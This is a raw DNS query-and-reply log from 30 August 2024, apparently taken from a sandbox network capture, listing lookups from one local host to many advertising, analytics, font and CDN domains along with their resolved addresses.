                                                                                                                                                                                                        Aug 30, 2024 18:16:48.046201944 CEST192.168.2.51.1.1.10xd3deStandard query (0)conversation.api.drift.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:48.060144901 CEST192.168.2.51.1.1.10xe09bStandard query (0)metrics.api.drift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:48.060470104 CEST192.168.2.51.1.1.10x4a7fStandard query (0)metrics.api.drift.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:48.082107067 CEST192.168.2.51.1.1.10xbbc3Standard query (0)targeting.api.drift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:48.082226992 CEST192.168.2.51.1.1.10xc2b6Standard query (0)targeting.api.drift.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.158179998 CEST192.168.2.51.1.1.10x6afeStandard query (0)analytics.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.158471107 CEST192.168.2.51.1.1.10xe693Standard query (0)analytics.google.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.159189939 CEST192.168.2.51.1.1.10xee56Standard query (0)stats.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.159568071 CEST192.168.2.51.1.1.10x91ddStandard query (0)stats.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.232912064 CEST192.168.2.51.1.1.10x1bd2Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.233059883 CEST192.168.2.51.1.1.10x1140Standard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.233589888 CEST192.168.2.51.1.1.10xc38fStandard query (0)td.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.233720064 CEST192.168.2.51.1.1.10x82a2Standard query (0)td.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.236859083 CEST192.168.2.51.1.1.10x9232Standard query (0)8036043.fls.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.237066031 CEST192.168.2.51.1.1.10x249eStandard query (0)8036043.fls.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.240022898 CEST192.168.2.51.1.1.10x1602Standard query (0)ad.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.240333080 CEST192.168.2.51.1.1.10x85caStandard query (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.265007019 CEST192.168.2.51.1.1.10x80ffStandard query (0)geolocation.onetrust.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.265130997 CEST192.168.2.51.1.1.10x9447Standard query (0)geolocation.onetrust.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.688163042 CEST192.168.2.51.1.1.10xfea7Standard query (0)js.driftt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.688312054 CEST192.168.2.51.1.1.10x45dbStandard query (0)js.driftt.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.858735085 CEST192.168.2.51.1.1.10xf8e5Standard query (0)www.datadoghq-browser-agent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.859038115 CEST192.168.2.51.1.1.10xe34dStandard query (0)www.datadoghq-browser-agent.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.863922119 CEST192.168.2.51.1.1.10xbf9dStandard query (0)cdn.cookielaw.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:49.864120960 CEST192.168.2.51.1.1.10x4b53Standard query (0)cdn.cookielaw.org65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.074486017 CEST192.168.2.51.1.1.10xde3dStandard query (0)unpkg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.074826956 CEST192.168.2.51.1.1.10x4463Standard query (0)unpkg.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.076770067 CEST192.168.2.51.1.1.10x1dc9Standard query (0)geolocation.onetrust.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.077001095 CEST192.168.2.51.1.1.10xe82bStandard query (0)geolocation.onetrust.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.230195045 CEST192.168.2.51.1.1.10xfc09Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.230353117 CEST192.168.2.51.1.1.10xc0b7Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.415091991 CEST192.168.2.51.1.1.10xab55Standard query (0)ad.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.415241957 CEST192.168.2.51.1.1.10xc428Standard query (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.416830063 CEST192.168.2.51.1.1.10x67fStandard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.416984081 CEST192.168.2.51.1.1.10xd696Standard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.417829037 CEST192.168.2.51.1.1.10xd193Standard query (0)forms-as-a-service.capterra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:50.417972088 CEST192.168.2.51.1.1.10xc1e3Standard query (0)forms-as-a-service.capterra.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:51.240827084 CEST192.168.2.51.1.1.10xd159Standard query (0)adservice.google.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:51.240828037 CEST192.168.2.51.1.1.10x4e83Standard query (0)adservice.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:51.362061024 CEST192.168.2.51.1.1.10x21a4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:51.362293005 CEST192.168.2.51.1.1.10xa040Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:51.595740080 CEST192.168.2.51.1.1.10xf76cStandard query (0)reviews.capterra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:51.597471952 CEST192.168.2.51.1.1.10x515Standard query (0)reviews.capterra.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:52.201292038 CEST192.168.2.51.1.1.10x9ecfStandard query (0)adservice.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:52.201452971 CEST192.168.2.51.1.1.10x68e4Standard query (0)adservice.google.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:56.036691904 CEST192.168.2.51.1.1.10x4f66Standard query (0)reviews.capterra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:56.037467957 CEST192.168.2.51.1.1.10x833fStandard query (0)reviews.capterra.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:58.996663094 CEST192.168.2.51.1.1.10x66e0Standard query (0)browser-intake-datadoghq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:59.000607014 CEST192.168.2.51.1.1.10xef6aStandard query (0)browser-intake-datadoghq.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:59.014997959 CEST192.168.2.51.1.1.10xb6a0Standard query (0)www.ipqualityscore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:59.015456915 CEST192.168.2.51.1.1.10x61efStandard query (0)www.ipqualityscore.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:59.017020941 CEST192.168.2.51.1.1.10x30bbStandard query (0)device.maxmind.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:59.017441034 CEST192.168.2.51.1.1.10x7940Standard query (0)device.maxmind.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:02.169462919 CEST192.168.2.51.1.1.10x5c6aStandard query (0)device.maxmind.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:02.169595003 CEST192.168.2.51.1.1.10x4dc2Standard query (0)device.maxmind.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:04.117940903 CEST192.168.2.51.1.1.10xebdStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:04.122195959 CEST192.168.2.51.1.1.10xbabaStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:04.313478947 CEST192.168.2.51.1.1.10xded1Standard query (0)d-ipv6.mmapiws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:04.313697100 CEST192.168.2.51.1.1.10x594aStandard query (0)d-ipv6.mmapiws.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:06.227838039 CEST192.168.2.51.1.1.10x9441Standard query (0)d-ipv6.mmapiws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:06.228199959 CEST192.168.2.51.1.1.10x3e05Standard query (0)d-ipv6.mmapiws.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:12.450321913 CEST192.168.2.51.1.1.10xa0f5Standard query (0)snap.licdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:12.450994015 CEST192.168.2.51.1.1.10x2e50Standard query (0)snap.licdn.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:12.453120947 CEST192.168.2.51.1.1.10xae9cStandard query (0)reveal.clearbit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:12.453587055 CEST192.168.2.51.1.1.10xdeb9Standard query (0)reveal.clearbit.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.132452965 CEST192.168.2.51.1.1.10x1755Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.132792950 CEST192.168.2.51.1.1.10x5d51Standard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.157176018 CEST192.168.2.51.1.1.10x783fStandard query (0)a.quora.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.157376051 CEST192.168.2.51.1.1.10x3eb6Standard query (0)a.quora.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.157821894 CEST192.168.2.51.1.1.10x9b11Standard query (0)img.en25.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.158016920 CEST192.168.2.51.1.1.10xb731Standard query (0)img.en25.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.158543110 CEST192.168.2.51.1.1.10x660Standard query (0)cdn0.capterra-static.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.158543110 CEST192.168.2.51.1.1.10xe781Standard query (0)cdn0.capterra-static.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.490561008 CEST192.168.2.51.1.1.10xa2a2Standard query (0)px.ads.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.490669012 CEST192.168.2.51.1.1.10xf787Standard query (0)px.ads.linkedin.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.760550976 CEST192.168.2.51.1.1.10xd8f0Standard query (0)reveal.clearbit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.761121035 CEST192.168.2.51.1.1.10x3934Standard query (0)reveal.clearbit.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.891417980 CEST192.168.2.51.1.1.10x6d32Standard query (0)a.quora.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:13.891783953 CEST192.168.2.51.1.1.10x2f49Standard query (0)a.quora.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.175719976 CEST192.168.2.51.1.1.10x496cStandard query (0)img.en25.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.175928116 CEST192.168.2.51.1.1.10x35c5Standard query (0)img.en25.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.209534883 CEST192.168.2.51.1.1.10xa9d5Standard query (0)c.lytics.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.209822893 CEST192.168.2.51.1.1.10x3ddfStandard query (0)c.lytics.io65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.211085081 CEST192.168.2.51.1.1.10x365fStandard query (0)q.quora.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.211412907 CEST192.168.2.51.1.1.10x6a56Standard query (0)q.quora.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.380223036 CEST192.168.2.51.1.1.10xccd6Standard query (0)tracking.capterra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.380223036 CEST192.168.2.51.1.1.10x9f21Standard query (0)tracking.capterra.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.382466078 CEST192.168.2.51.1.1.10x1962Standard query (0)cdn0.capterra-static.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.382466078 CEST192.168.2.51.1.1.10x5928Standard query (0)cdn0.capterra-static.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.387557983 CEST192.168.2.51.1.1.10xef2aStandard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.387784004 CEST192.168.2.51.1.1.10xedf2Standard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.445420027 CEST192.168.2.51.1.1.10xc4d8Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:14.445671082 CEST192.168.2.51.1.1.10x28c4Standard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.026882887 CEST192.168.2.51.1.1.10xc517Standard query (0)c.lytics.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.026882887 CEST192.168.2.51.1.1.10x756eStandard query (0)c.lytics.io65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.097014904 CEST192.168.2.51.1.1.10x53d7Standard query (0)q.quora.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.097194910 CEST192.168.2.51.1.1.10xec9dStandard query (0)q.quora.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.326354980 CEST192.168.2.51.1.1.10x963bStandard query (0)evantaagartnercompany.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.326637983 CEST192.168.2.51.1.1.10xdcdStandard query (0)evantaagartnercompany.demdex.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.328704119 CEST192.168.2.51.1.1.10x71efStandard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.328704119 CEST192.168.2.51.1.1.10x9c69Standard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.479723930 CEST192.168.2.51.1.1.10x4761Standard query (0)edge.fullstory.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:15.479887962 CEST192.168.2.51.1.1.10xc377Standard query (0)edge.fullstory.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:16.282967091 CEST192.168.2.51.1.1.10xcd7dStandard query (0)c.lytics.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:16.283189058 CEST192.168.2.51.1.1.10xcba5Standard query (0)c.lytics.io65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:16.400096893 CEST192.168.2.51.1.1.10x3e4aStandard query (0)cm.everesttech.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:16.400163889 CEST192.168.2.51.1.1.10xd87bStandard query (0)cm.everesttech.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:16.402147055 CEST192.168.2.51.1.1.10xdd49Standard query (0)edge.fullstory.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:16.402148008 CEST192.168.2.51.1.1.10x4641Standard query (0)edge.fullstory.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:17.136698961 CEST192.168.2.51.1.1.10xe5d0Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:17.136805058 CEST192.168.2.51.1.1.10x84c4Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:17.155513048 CEST192.168.2.51.1.1.10xbc5aStandard query (0)tracking.capterra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:17:17.155654907 CEST192.168.2.51.1.1.10x5b0Standard query (0)tracking.capterra.com65IN (0x0001)false
                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                        Aug 30, 2024 18:15:36.300312996 CEST1.1.1.1192.168.2.50x1af4No error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:36.300324917 CEST1.1.1.1192.168.2.50xb3c4No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:36.357036114 CEST1.1.1.1192.168.2.50xe32eNo error (0)prod.adobeccstatic.com18.239.83.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:36.357036114 CEST1.1.1.1192.168.2.50xe32eNo error (0)prod.adobeccstatic.com18.239.83.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:36.357036114 CEST1.1.1.1192.168.2.50xe32eNo error (0)prod.adobeccstatic.com18.239.83.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:36.357036114 CEST1.1.1.1192.168.2.50xe32eNo error (0)prod.adobeccstatic.com18.239.83.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:36.357851982 CEST1.1.1.1192.168.2.50xeb3cNo error (0)use.typekit.netuse-stls.adobe.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:36.357929945 CEST1.1.1.1192.168.2.50x72ebNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:36.357929945 CEST1.1.1.1192.168.2.50x72ebNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:36.358211040 CEST1.1.1.1192.168.2.50xf3b3No error (0)use.typekit.netuse-stls.adobe.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:36.358653069 CEST1.1.1.1192.168.2.50x4c88No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:37.451725960 CEST1.1.1.1192.168.2.50xb4ccNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:37.451725960 CEST1.1.1.1192.168.2.50xb4ccNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:37.456152916 CEST1.1.1.1192.168.2.50x77fbNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:38.098191977 CEST1.1.1.1192.168.2.50xb795No error (0)p.typekit.netp.typekit.net-stls-v3.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:38.098839045 CEST1.1.1.1192.168.2.50x9ad7No error (0)p.typekit.netp.typekit.net-stls-v3.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:39.496320963 CEST1.1.1.1192.168.2.50x8fb5No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:39.496320963 CEST1.1.1.1192.168.2.50x8fb5No error (0)scontent.xx.fbcdn.net157.240.252.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:39.497832060 CEST1.1.1.1192.168.2.50x48fdNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:39.497832060 CEST1.1.1.1192.168.2.50x48fdNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:39.497832060 CEST1.1.1.1192.168.2.50x48fdNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:41.561757088 CEST1.1.1.1192.168.2.50x318bNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:41.561757088 CEST1.1.1.1192.168.2.50x318bNo error (0)scontent.xx.fbcdn.net157.240.0.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:41.561883926 CEST1.1.1.1192.168.2.50xdc76No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:41.561883926 CEST1.1.1.1192.168.2.50xdc76No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:41.561883926 CEST1.1.1.1192.168.2.50xdc76No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:48.325918913 CEST1.1.1.1192.168.2.50x3cbfNo error (0)js-agent.newrelic.com162.247.243.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:49.208277941 CEST1.1.1.1192.168.2.50x95dbNo error (0)bam-cell.nr-data.netbam-cell.cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:49.208277941 CEST1.1.1.1192.168.2.50x95dbNo error (0)bam-cell.cell.nr-data.netfastly-tls12-bam-cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:49.208277941 CEST1.1.1.1192.168.2.50x95dbNo error (0)fastly-tls12-bam-cell.nr-data.net162.247.243.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:49.208312035 CEST1.1.1.1192.168.2.50x5f4fNo error (0)js-agent.newrelic.com162.247.243.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:49.208321095 CEST1.1.1.1192.168.2.50xc240No error (0)bam-cell.nr-data.netbam-cell.cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:49.208321095 CEST1.1.1.1192.168.2.50xc240No error (0)bam-cell.cell.nr-data.nettls12.newrelic.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:50.676057100 CEST1.1.1.1192.168.2.50x4677No error (0)bam-cell.nr-data.netbam-cell.cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:50.676057100 CEST1.1.1.1192.168.2.50x4677No error (0)bam-cell.cell.nr-data.netfastly-tls12-bam-cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:50.678649902 CEST1.1.1.1192.168.2.50xd248No error (0)bam-cell.nr-data.netbam-cell.cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:50.678649902 CEST1.1.1.1192.168.2.50xd248No error (0)bam-cell.cell.nr-data.netfastly-tls12-bam-cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:15:50.678649902 CEST1.1.1.1192.168.2.50xd248No error (0)fastly-tls12-bam-cell.nr-data.net162.247.243.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:01.211251020 CEST1.1.1.1192.168.2.50x2912No error (0)pblc.me172.67.129.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:01.211251020 CEST1.1.1.1192.168.2.50x2912No error (0)pblc.me104.21.2.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:01.220045090 CEST1.1.1.1192.168.2.50x43f1No error (0)pblc.me65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:02.245487928 CEST1.1.1.1192.168.2.50xc79No error (0)img.pblc.it65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:02.283668041 CEST1.1.1.1192.168.2.50x9a9No error (0)img.pblc.it188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:02.283668041 CEST1.1.1.1192.168.2.50x9a9No error (0)img.pblc.it188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:03.335999966 CEST1.1.1.1192.168.2.50x53b7No error (0)img.pblc.it188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:03.335999966 CEST1.1.1.1192.168.2.50x53b7No error (0)img.pblc.it188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:03.380022049 CEST1.1.1.1192.168.2.50xf992No error (0)img.pblc.it65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:03.759335995 CEST1.1.1.1192.168.2.50x60ecNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:13.315506935 CEST1.1.1.1192.168.2.50xcd2eNo error (0)pub-e1c6f3d85d51402790227684363ac52c.r2.dev104.18.2.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:13.315506935 CEST1.1.1.1192.168.2.50xcd2eNo error (0)pub-e1c6f3d85d51402790227684363ac52c.r2.dev104.18.3.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:14.154371977 CEST1.1.1.1192.168.2.50xda54No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:14.154371977 CEST1.1.1.1192.168.2.50xda54No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:14.154432058 CEST1.1.1.1192.168.2.50x941eNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:14.156321049 CEST1.1.1.1192.168.2.50xcdc5No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:14.156321049 CEST1.1.1.1192.168.2.50xcdc5No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:14.157386065 CEST1.1.1.1192.168.2.50x7f26No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:16.370654106 CEST1.1.1.1192.168.2.50x7fa0No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 30, 2024 18:16:16.370654106 CEST1.1.1.1192.168.2.50x7fa0No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
